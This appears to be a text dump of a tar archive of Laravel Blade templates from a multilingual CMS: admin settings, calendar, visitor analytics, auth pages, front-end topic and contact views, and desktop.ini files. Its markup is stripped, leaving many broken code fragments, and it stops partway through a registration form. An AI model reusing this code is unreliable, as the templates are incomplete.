{!! Form::textarea('customField_'.$customField->id,$customField->default_value, array('placeholder' => '','class' => 'form-control',$cf_required=>'', 'dir'=>$cf_land_dir,'rows'=>'5')) !!}
@else {{--Text Box--}}
{!! Form::text('customField_'.$customField->id,$customField->default_value, array('placeholder' => '','class' => 'form-control','id'=>'customField_'.$customField->id,$cf_required=>'', 'dir'=>$cf_land_dir)) !!}
@endif @endif @endforeach @endif {{--End of -- Additional Feilds--}}
{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection @section('footerInclude') @endsectionviews/backEnd/topics/desktop.ini000064400000000216147565226270012722 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/settings/settings.blade.php000064400000200244147565226270014531 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')
{{Form::open(['route'=>['settingsUpdateSiteInfo'],'method'=>'POST'])}}
  {!! trans('backLang.siteInfoSettings') !!}
@if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::text('site_title_ar',$Setting->site_title_ar, array('placeholder' => trans('backLang.websiteTitle'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::text('site_title_he',$Setting->site_title_he, array('placeholder' => trans('backLang.websiteTitle'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::text('site_title_en',$Setting->site_title_en, array('placeholder' => trans('backLang.websiteTitle'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::textarea('site_desc_ar',$Setting->site_desc_ar, array('placeholder' => trans('backLang.metaDescription'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'2')) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::textarea('site_desc_he',$Setting->site_desc_he, array('placeholder' => trans('backLang.metaDescription'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'2')) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::textarea('site_desc_en',$Setting->site_desc_en, array('placeholder' => trans('backLang.metaDescription'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'),'rows'=>'2')) !!}
@endif @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::textarea('site_keywords_ar',$Setting->site_keywords_ar, array('placeholder' => trans('backLang.metaKeywords'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'2')) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::textarea('site_keywords_he',$Setting->site_keywords_he, array('placeholder' => trans('backLang.metaKeywords'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'2')) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::textarea('site_keywords_en',$Setting->site_keywords_en, array('placeholder' => trans('backLang.metaKeywords'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'),'rows'=>'2')) !!}
@endif
{!! Form::text('site_url',$Setting->site_url, array('placeholder' => 'http//:www.sitename.com/','class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}

{!! trans('backLang.emailNotifications') !!}

{!! Form::text('site_webmails',$Setting->site_webmails, array('placeholder' => 'email@sitename.com','class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
   
   
   
{{Form::close()}}
{{Form::open(['route'=>['settingsUpdateContacts'],'method'=>'POST'])}}
  {!! trans('backLang.siteContactsSettings') !!}
@if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::text('contact_t1_ar',$Setting->contact_t1_ar, array('placeholder' => trans('backLang.contactAddress'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::text('contact_t1_he',$Setting->contact_t1_he, array('placeholder' => trans('backLang.contactAddress'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::text('contact_t1_en',$Setting->contact_t1_en, array('placeholder' => trans('backLang.contactAddress'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
@endif
{!! Form::text('contact_t3',$Setting->contact_t3, array('placeholder' => trans('backLang.contactPhone'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('contact_t4',$Setting->contact_t4, array('placeholder' => trans('backLang.contactFax'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('contact_t5',$Setting->contact_t5, array('placeholder' => trans('backLang.contactMobile'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('contact_t6',$Setting->contact_t6, array('placeholder' => trans('backLang.contactEmail'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
@if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::text('contact_t7_ar',$Setting->contact_t7_ar, array('placeholder' => trans('backLang.worksTime'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::text('contact_t7_he',$Setting->contact_t7_he, array('placeholder' => trans('backLang.worksTime'),'class' => 'form-control', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::text('contact_t7_en',$Setting->contact_t7_en, array('placeholder' => trans('backLang.worksTime'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
@endif
{{Form::close()}}
{{Form::open(['route'=>['settingsUpdateSocialLinks'],'method'=>'POST'])}}
  {!! trans('backLang.siteSocialSettings') !!}
{!! Form::text('social_link1',$Setting->social_link1, array('placeholder' => trans('backLang.facebook'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('social_link2',$Setting->social_link2, array('placeholder' => trans('backLang.twitter'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('social_link3',$Setting->social_link3, array('placeholder' => trans('backLang.google'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('social_link4',$Setting->social_link4, array('placeholder' => trans('backLang.linkedin'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('social_link5',$Setting->social_link5, array('placeholder' => trans('backLang.youtube'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('social_link6',$Setting->social_link6, array('placeholder' => trans('backLang.instagram'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('social_link7',$Setting->social_link7, array('placeholder' => trans('backLang.pinterest'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('social_link8',$Setting->social_link8, array('placeholder' => trans('backLang.tumblr'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('social_link9',$Setting->social_link9, array('placeholder' => trans('backLang.flickr'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{!! Form::text('social_link10',$Setting->social_link10, array('placeholder' => trans('backLang.whatapp'),'class' => 'form-control', 'dir'=>trans('backLang.ltr'))) !!}
{{Form::close()}}
{{Form::open(['route'=>['settingsUpdateSiteStatus'],'method'=>'POST'])}}
  {!! trans('backLang.siteStatusSettings') !!}
   
site_status) ? "style='display:none'":"" !!}> {!! Form::textarea('close_msg',$Setting->close_msg, array('placeholder' => trans('backLang.siteStatusSettingsMsg'),'class' => 'form-control','rows'=>'4')) !!}
{{Form::close()}}
{{Form::open(['route'=>['settingsUpdateSiteStyle'],'method'=>'POST', 'files' => true])}}
  {!! trans('backLang.styleSettings') !!}
@if(Helper::GeneralWebmasterSettings("ar_box_status"))
@if($Setting->style_logo_ar!="") @else

nologo.png
@endif {!! Form::file('style_logo_ar', array('class' => 'form-control','id'=>'style_logo_ar','accept'=>'image/*')) !!} ( 260x60 px ) - {!! trans('backLang.imagesTypes') !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
@if($Setting->style_logo_he!="") @else

nologo.png
@endif {!! Form::file('style_logo_he', array('class' => 'form-control','id'=>'style_logo_he','accept'=>'image/*')) !!} ( 260x60 px ) - {!! trans('backLang.imagesTypes') !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
@if($Setting->style_logo_en!="") @else

nologo.png
@endif {!! Form::file('style_logo_en', array('class' => 'form-control','id'=>'style_logo_en','accept'=>'image/*')) !!} ( 260x60 px ) - {!! trans('backLang.imagesTypes') !!}
@endif

@if($Setting->style_fav!="") @else @endif {!! Form::file('style_fav', array('class' => 'form-control','id'=>'style_fav','accept'=>'image/*')) !!} ( 32x32 px ) - {!! trans('backLang.imagesTypes') !!}
@if($Setting->style_apple!="") @else @endif {!! Form::file('style_apple', array('class' => 'form-control','id'=>'style_apple','accept'=>'image/*')) !!} ( 180x180 px ) - {!! trans('backLang.imagesTypes') !!}

{!! Form::text('style_color1',$Setting->style_color1, array('placeholder' => '','class' => 'form-control','id'=>'style_color1', 'dir'=>trans('backLang.ltr'))) !!}
{!! trans('backLang.restoreDefault') !!}
{!! Form::text('style_color2',$Setting->style_color2, array('placeholder' => '','class' => 'form-control','id'=>'style_color2', 'dir'=>trans('backLang.ltr'))) !!}
{!! trans('backLang.restoreDefault') !!}

   
style_type) ? "style='display:none'":"" !!}>
       
style_bg_type!=0) ? "style='display:none'":"" !!}>
{!! Form::text('style_bg_color',$Setting->style_bg_color, array('placeholder' => '','class' => 'form-control','id'=>'style_bg_color', 'dir'=>trans('backLang.ltr'))) !!}
style_bg_type!=1) ? "style='display:none'":"" !!}>
@for($i=1;$i<=24;$i++)
@endfor
style_bg_type!=2) ? "style='display:none'":"" !!}>
@if($Setting->style_bg_image!="") @endif {!! Form::file('style_bg_image', array('class' => 'form-control','id'=>'style_bg_image','accept'=>'image/*')) !!} ( 260x60 px ) - {!! trans('backLang.imagesTypes') !!}

   
@if($Setting->style_footer_bg!="")
{!! Form::hidden('photo_delete','0', array('id'=>'photo_delete')) !!}
@endif {!! Form::file('style_footer_bg', array('class' => 'form-control','id'=>'style_footer_bg','accept'=>'image/*')) !!} ( 260x60 px ) - {!! trans('backLang.imagesTypes') !!}

   

   

{{Form::close()}}
@endsection @section('footerInclude') @endsection views/backEnd/settings/desktop.ini000064400000000216147565226270013261 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/calendar.blade.php000064400000112641147565226270012605 0ustar00@extends('backEnd.layout') @section('content') @if($EStatus=="edit") @endif
$Event->id]) }}', start: '{{ date('Y-m-d', strtotime($Event->start_date)) }}', end: '{{ date('Y-m-d', strtotime($Event->end_date)) }}', className: ['info'] }, @elseif($Event->type ==2) { id: {!! $Event->id !!}, title: '{!! $Event->title !!}', url: '{{ route("calendarEdit",["id"=>$Event->id]) }}', start: '{{ date('Y-m-d H:i:s', strtotime($Event->start_date)) }}', end: '{{ date('Y-m-d H:i:s', strtotime($Event->end_date)) }}', className: ['danger'] }, @elseif($Event->type ==1) { id: {!! $Event->id !!}, title: '{!! $Event->title !!}', url: '{{ route("calendarEdit",["id"=>$Event->id]) }}', start: '{{ date('Y-m-d H:i:s', strtotime($Event->start_date)) }}', className: ['green'] }, @else { id: {!! $Event->id !!}, title: '{!! $Event->title !!}', url: '{{ route("calendarEdit",["id"=>$Event->id]) }}', start: '{{ date('Y-m-d', strtotime($Event->start_date)) }}', className: ['white'] }, @endif @endforeach ], eventResize: function(event, delta, revertFunc) { if (!confirm('is this okay?')) { revertFunc(); }else{ $(document).ready(function(){ $.ajax({ url: '{{ URL::to(env('BACKEND_PATH')."/calendar/") }}/' + event.id + '/extend', type: 'post', data: {'started_on': event.start.format(),'ended_on':event.end.format(),'_token':'{{ csrf_token() }}'}, success: function(data){ } }); }); } }, eventDrop: function( event, delta, revertFunc, jsEvent, ui, view ) { if (!confirm('is this okay?')) { revertFunc(); }else{ $(document).ready(function(){ $.ajax({ url: '{{ URL::to(env('BACKEND_PATH')."/calendar/") }}/' + event.id + '/extend', type: 'post', data: {'started_on': event.start.format(),'_token':'{{ csrf_token() }}'}, success: function(data){ } }); }); } } }">

{{ trans('backLang.eventTotal') }} : ( {{ count($Events) }} ) {{ trans('backLang.eventClear') }}
@endsection @section('footerInclude') @endsection views/backEnd/desktop.ini000064400000000216147565226270011421 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/ip.blade.php000064400000027325147565226270011450 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')
@if($ip_code!="")

{{ trans('backLang.visitorsAnalyticsIPInquiry') }}

{{ trans('backLang.home') }} / {{ trans('backLang.visitorsAnalytics') }}
{{Form::open(['route'=>['visitorsSearch'],'method'=>'POST'])}}
{!! Form::text('ip',$ip_code, array('placeholder' => trans('backLang.ip')."...",'class' => 'form-control','id'=>'name','required'=>'')) !!}
{{Form::close()}}
@else

{{ trans('backLang.visitorsAnalyticsIPInquiry') }}

{{ trans('backLang.home') }} / {{ trans('backLang.visitorsAnalytics') }}
{{Form::open(['route'=>['visitorsSearch'],'method'=>'POST'])}}
{!! Form::text('ip',$ip_code, array('placeholder' => trans('backLang.ip')."...",'class' => 'form-control','id'=>'name','required'=>'')) !!}
{{Form::close()}}
@endif @if($ip_code!="")
@foreach($AnalyticsVisitors as $AnalyticsVisitor) @if($lmt==0) location_cor1; $visitor_loc_1 = $AnalyticsVisitor->location_cor2; $flag = ""; $country_code = strtolower($AnalyticsVisitor->country_code); if ($country_code != "unknown") { $flag = "
"; } ?> @endif @endforeach
{{ trans('backLang.visitorsAnalyticsByCountry') }}: {!! $flag !!}  {{ $AnalyticsVisitor->country }}
{{ trans('backLang.visitorsAnalyticsByCity') }} : {{ $AnalyticsVisitor->city }}
{{ trans('backLang.visitorsAnalyticsByRegion') }}: {{ $AnalyticsVisitor->region }}
{{ trans('backLang.visitorsAnalyticsByAddress') }}: {{ $AnalyticsVisitor->full_address }}
{{ trans('backLang.visitorsAnalyticsByHostName') }}: {{ $AnalyticsVisitor->hostname }}
{{ trans('backLang.visitorsAnalyticsByOrganization') }} : {{ $AnalyticsVisitor->org }}
{{ trans('backLang.visitorsAnalyticsLastVisit') }}: {{ $AnalyticsVisitor->date }}   {{date('h:i A', strtotime($AnalyticsVisitor->time)) }}
{{ trans('backLang.visitorsAnalyticsByOperatingSystem') }} : {{ $AnalyticsVisitor->os }}
{{ trans('backLang.visitorsAnalyticsByBrowser') }}: {{ $AnalyticsVisitor->browser }}
{{ trans('backLang.visitorsAnalyticsByScreenResolution') }} : {{ $AnalyticsVisitor->resolution }}
{{ trans('backLang.visitorsAnalyticsByReachWay') }}: {{ $AnalyticsVisitor->referrer }}

@endif
@if($ip_code!="")
{{ trans('backLang.activitiesHistory') }}
vPages as $page){ if ($ii > 100) { break 2; } ?>
{{ trans('backLang.topicDate') }} {{ trans('backLang.activity') }}
{{$page->date}}   {{date('h:i A', strtotime($page->time)) }} {{$page->title}}

@endif @endsection @section('footerInclude') @endsection views/backEnd/visitors.blade.php000064400000005051147565226270012712 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')

{{ trans('backLang.visitorsAnalyticsVisitorsHistory') }}

{{ trans('backLang.home') }} / {{ trans('backLang.visitorsAnalytics') }}
@foreach($AnalyticsVisitors as $Analytic) country_code); if ($country_code != "unknown") { $flag = "
"; } ?> @endforeach
{{ trans('backLang.topicDate') }} {{ trans('backLang.ip') }} {{ trans('backLang.visitorsAnalyticsByCity') }} {{ trans('backLang.visitorsAnalyticsByCountry') }}
{{$Analytic->date}}   {{date('h:i A', strtotime($Analytic->time)) }} ip)}}">{{$Analytic->ip}} {{$Analytic->city}} {!! $flag !!}  {{$Analytic->country}}

{!! $AnalyticsVisitors->links() !!}

@endsection @section('footerInclude') @endsection views/auth/passwords/reset.blade.php000064400000005312147565226270013611 0ustar00 @include('backEnd.includes.head')
{{ trans('backLang.resetPassword') }}
{{ csrf_field() }}
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
@if ($errors->has('password_confirmation')) {{ $errors->first('password_confirmation') }} @endif
@include('backEnd.includes.foot') views/auth/passwords/email.blade.php000064400000004202147565226270013553 0ustar00 @include('backEnd.includes.head')
{{ trans('backLang.forgotPassword') }}

{{ trans('backLang.enterYourEmail') }}

@if (session('status'))
{{ session('status') }}
@endif
{{ csrf_field() }}
@if ($errors->has('email')) {{ $errors->first('email') }} @endif

{{ trans('backLang.returnTo') }} {{ trans('backLang.signIn') }}
@include('backEnd.includes.foot') views/auth/passwords/desktop.ini000064400000000216147565226270013060 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/auth/login.blade.php000064400000006123147565226270011553 0ustar00 @include('backEnd.includes.head')
{{ trans('backLang.signedInToControl') }}
{{ csrf_field() }} @if ($errors->has('email'))
{{ $errors->first('email') }}
@endif
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
@if(Helper::GeneralWebmasterSettings("register_status"))
@endif
@include('backEnd.includes.foot') views/auth/register.blade.php000064400000006460147565226270012273 0ustar00@if(Helper::GeneralWebmasterSettings("register_status")) @include('backEnd.includes.head')
{{ trans('backLang.newUser') }}
{{ csrf_field() }} @if ($errors->has('name'))
{{ $errors->first('name') }}
@endif @if ($errors->has('email'))
{{ $errors->first('email') }}
@endif @if ($errors->has('password'))
{{ $errors->first('password') }}
@endif
{{ trans('backLang.signedInToControl') }} {{ trans('backLang.signIn') }}
@include('backEnd.includes.foot') @else @endif views/auth/desktop.ini000064400000000216147565226270011033 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/frontEnd/ticket.blade.php000064400000010274147565226270012546 0ustar00@extends('frontEnd.layout') @section('content')

{{ trans('frontLang.orderForm') }}

@if(Session::has('doneMessage'))
{{ Session::get('doneMessage') }} {{ Session::get('ticketnumber') }} {{ Session::get('trackTeckitMessage') }}
@endif @if ($errors->any())
    @foreach ($errors->all() as $error)
  • {{ $error }}
  • @endforeach
@endif {{Form::open(['route'=>['submitNewTicket'],'files' => true,'method'=>'POST','class'=>'newTicket'])}}
{!! Form::text('fname',"", array('placeholder' => trans('backLang.fname'),'class' => 'form-control','id'=>'fname', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('lastName',"", array('placeholder' => trans('backLang.lastName'),'class' => 'form-control','id'=>'lastName', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('email',"", array('placeholder' => trans('frontLang.yourEmail'),'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::text('phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'))) !!}
{!! Form::text('cell_phone',"", array('placeholder' => trans('frontLang.cellPhone'),'class' => 'form-control','id'=>'cell_phone', 'data-msg'=> trans('frontLang.yourCellPhone'),'data-rule'=>'minlen:8')) !!}
{!! Form::text('title',"", array('placeholder' => trans('frontLang.subject'),'class' => 'form-control','id'=>'title', 'data-msg'=> trans('frontLang.enterSubject'),'data-rule'=>'minlen:5')) !!}
{!! Form::textarea('message','', array('placeholder' => trans('frontLang.notes'),'class' => 'form-control','id'=>'message','rows'=>'5')) !!}
{!! Form::file('uploads', array('class' => 'form-control','id'=>'uploads')) !!}
{{Form::close()}}
@endsectionviews/frontEnd/layout.blade.php000064400000004542147565226270012601 0ustar00 @include('frontEnd.includes.head') @include('frontEnd.includes.colors')
@include('frontEnd.includes.header') @yield('content') @include('frontEnd.includes.footer')
@include('frontEnd.includes.foot') @yield('footerInclude') @if(Helper::GeneralSiteSettings("style_preload"))
@endif views/frontEnd/contacts.blade.php000064400000012563147565226270013104 0ustar00 @extends('frontEnd.layout') @section('content')
@foreach($Contacts as $contact) $title_var != "") { $title = $contact->$title_var; } else { $title = $contact->$title_var2; } if ($contact->$details_var != "") { $details = $details_var; } else { $details = $details_var2; } $section = ""; try { if ($contact->section->$title_var != "") { $section = $contact->section->$title_var; } else { $section = $contact->section->$title_var2; } } catch (Exception $e) { $section = ""; } ?>

{!! $title !!}

@foreach($contact->webmasterSection->customFields as $customField) $cf_title_var != "") { $cf_title = $customField->$cf_title_var; } else { $cf_title = $customField->$cf_title_var2; } $cf_saved_val = ""; $cf_saved_val_array = array(); if (count($contact->fields) > 0) { foreach ($contact->fields as $t_field) { if ($t_field->field_id == $customField->id) { $cf_saved_val = $t_field->field_value; } } } ?> @if(($cf_saved_val!=""|| count($cf_saved_val_array)>0)&& ($customField->lang_code=="all")|| $customField->lang_code == trans('backLang.boxCode'))

{!! $cf_title !!} : {!! $cf_saved_val !!}

@endif @endforeach
@endforeach
@endsectionviews/frontEnd/topic.blade.php000064400000325525147565226270012411 0ustar00@extends('frontEnd.layout') @section('content') $title_var != "") { $title = $Topic->$title_var; } else { $title = $Topic->$title_var2; } if ($Topic->$details_var != "") { $details = $details_var; } else { $details = $details_var2; } $section = ""; try { if ($Topic->section->$title_var != "") { $section = $Topic->section->$title_var; } else { $section = $Topic->section->$title_var2; } } catch (Exception $e) { $section = ""; } ?>
@if($WebmasterSection->type==2 && $Topic->video_file!="") {{--video--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->video_type ==1) video_file); ?> @if($Youtube_id !="") {{-- Youtube Video --}} @endif @elseif($Topic->video_type ==2) video_file); ?> @if($Vimeo_id !="") {{-- Vimeo Video --}} @endif @elseif($Topic->video_type ==3) @if($Topic->video_file !="") {{-- Embed Video --}} {!! $Topic->video_file !!} @endif @else @endif
@elseif($WebmasterSection->type==3 && $Topic->audio_file!="") {{--audio--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->photo_file !="") {{ $title }} @endif
@elseif(!empty($Topic->photos)) {{--photo slider--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->photo_file !="") @endif @foreach($Topic->photos as $photo)
{{ $photo->title  }}
@endforeach
@else {{--one photo--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->photo_file !="") {{ $title }} @endif
@endif {{--Additional Feilds--}} @if(!empty($Topic->webmasterSection->customFields) )
@foreach($Topic->webmasterSection->customFields as $customField) $cf_title_var != "") { $cf_title = $customField->$cf_title_var; } else { $cf_title = $customField->$cf_title_var2; } $cf_saved_val = ""; $cf_saved_val_array = array(); if (!empty($Topic->fields)) { foreach ($Topic->fields as $t_field) { if ($t_field->field_id == $customField->id) { if ($customField->type == 7) { // if multi check $cf_saved_val_array = explode(", ", $t_field->field_value); } else { $cf_saved_val = $t_field->field_value; } } } } ?> @if(($cf_saved_val!="" || !empty($cf_saved_val_array) ) && ($customField->lang_code == "all" || $customField->lang_code == trans('backLang.boxCode'))) @if($customField->type ==12) {{--Vimeo Video Link--}} @if($CF_Vimeo_id !="")
{!! $cf_title !!} :
{{-- Vimeo Video --}}
@endif @elseif($customField->type ==11) {{--Youtube Video Link--}} @if($CF_Youtube_id !="")
{!! $cf_title !!} :
{{-- Youtube Video --}}
@endif @elseif($customField->type ==10) {{--Video File--}}
{!! $cf_title !!} :
@elseif($customField->type ==9) {{--Attach File--}} @elseif($customField->type ==8) {{--Photo File--}}
{!! $cf_title !!} :
{{ $cf_title }} - {{ $title }}
@elseif($customField->type ==7) {{--Multi Check--}}
{!! $cf_title !!} :
$cf_details_var != "") { $cf_details = $customField->$cf_details_var; } else { $cf_details = $customField->$cf_details_var2; } $cf_details_lines = preg_split('/\r\n|[\r\n]/', $cf_details); $line_num = 1; ?> @foreach ($cf_details_lines as $cf_details_line) @if (in_array($line_num,$cf_saved_val_array)) {!! $cf_details_line !!} @endif @endforeach
@elseif($customField->type ==6) {{--Select--}}
{!! $cf_title !!} :
$cf_details_var != "") { $cf_details = $customField->$cf_details_var; } else { $cf_details = $customField->$cf_details_var2; } $cf_details_lines = preg_split('/\r\n|[\r\n]/', $cf_details); $line_num = 1; ?> @foreach ($cf_details_lines as $cf_details_line) @if ($line_num == $cf_saved_val) {!! $cf_details_line !!} @endif @endforeach
@elseif($customField->type ==5) {{--Date & Time--}}
{!! $cf_title !!} :
{!! date('Y-m-d H:i:s', strtotime($cf_saved_val)) !!}
@elseif($customField->type ==4) {{--Date--}}
{!! $cf_title !!} :
{!! date('Y-m-d', strtotime($cf_saved_val)) !!}
@elseif($customField->type ==3) {{--Email Address--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@elseif($customField->type ==2) {{--Number--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@elseif($customField->type ==1) {{--Text Area--}}
{!! $cf_title !!} :
{!! nl2br($cf_saved_val) !!}
@else {{--Text Box--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@endif @endif @endforeach

@endif {{--End of -- Additional Feilds--}} {!! $Topic->$details !!} @if($Topic->attach_file !="") attach_file, "."); $file_ext = strtolower($file_ext); ?>
@if($file_ext ==".jpg"|| $file_ext ==".jpeg"|| $file_ext ==".png"|| $file_ext ==".gif")
{{ $title }}
@else {!! Helper::GetIcon(URL::to('uploads/topics/'),$Topic->attach_file) !!}  {{ trans('frontLang.downloadAttach') }} @endif
@endif {{-- Show Additional attach files --}} @if(!empty($Topic->attachFiles))
@foreach($Topic->attachFiles as $attachFile) $title_var != "") { $file_title = $attachFile->$title_var; } else { $file_title = $attachFile->$title_var2; } ?> @endforeach
@endif
{{ trans('frontLang.share') }} :
@if(!empty($Topic->maps) )

{{ trans('frontLang.locationMap') }}

@endif @if($WebmasterSection->comments_status)
@if(!empty($Topic->approvedComments))

{{ trans('frontLang.comments') }}


@foreach($Topic->approvedComments as $comment) date)); ?>
{{$comment->name}}
{{$comment->name}}
{{ $dtformated }}
{!! nl2br(strip_tags($comment->comment)) !!}
@endforeach @endif

{{ trans('frontLang.newComment') }}

 {{ trans('frontLang.youCommentSent') }}   {{ trans('frontLang.refresh') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['Home'],'method'=>'POST','class'=>'commentForm'])}}
{!! Form::text('comment_name',"", array('placeholder' => trans('frontLang.yourName'),'class' => 'form-control','id'=>'comment_name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('comment_email',"", array('placeholder' => trans('frontLang.yourEmail'),'class' => 'form-control','id'=>'comment_email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::textarea('comment_message','', array('placeholder' => trans('frontLang.comment'),'class' => 'form-control','id'=>'comment_message','rows'=>'5', 'data-msg'=> trans('frontLang.enterYourComment'),'data-rule'=>'required')) !!}
@if(env('NOCAPTCHA_STATUS', false))
{!! app('captcha')->display($attributes = [], $lang = trans('backLang.code')) !!}
@endif
{{Form::close()}}
@endif @if($WebmasterSection->order_status)

{{ trans('frontLang.orderForm') }}

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['Home'],'method'=>'POST','class'=>'orderForm'])}}
{!! Form::text('order_name',"", array('placeholder' => trans('frontLang.yourName'),'class' => 'form-control','id'=>'order_name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('order_phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'order_phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('order_email',"", array('placeholder' => trans('frontLang.yourEmail'),'class' => 'form-control','id'=>'order_email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::number('order_qty',"", array('placeholder' => trans('frontLang.quantity'),'class' => 'form-control','id'=>'order_qty', 'data-msg'=> trans('frontLang.yourQuantity'),'data-rule'=>'minlen:1','min'=>'1')) !!}
{!! Form::textarea('order_message','', array('placeholder' => trans('frontLang.notes'),'class' => 'form-control','id'=>'order_message','rows'=>'5')) !!}
@if(env('NOCAPTCHA_STATUS', false))
{!! app('captcha')->display($attributes = [], $lang = trans('backLang.code')) !!}
@endif
{{Form::close()}}
@endif @if($WebmasterSection->form_status&& $Topic->id=="40")

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['kindergartenRegSubmit'],'method'=>'POST','class'=>'kindergartenForm','id'=>'kindergartenForm'])}}

{{trans('frontLang.parentDetails')}}

{!! Form::text('pname',"", array('placeholder' => trans('frontLang.fullName'),'class' => 'form-control','id'=>'pname', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::number('id',"", array('placeholder' => trans('frontLang.idNumber'),'class' => 'form-control','id'=>'id', 'data-msg'=> trans('frontLang.yourQuantity'),'data-rule'=>'minlen:9','min'=>'9')) !!}
{!! Form::text('phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
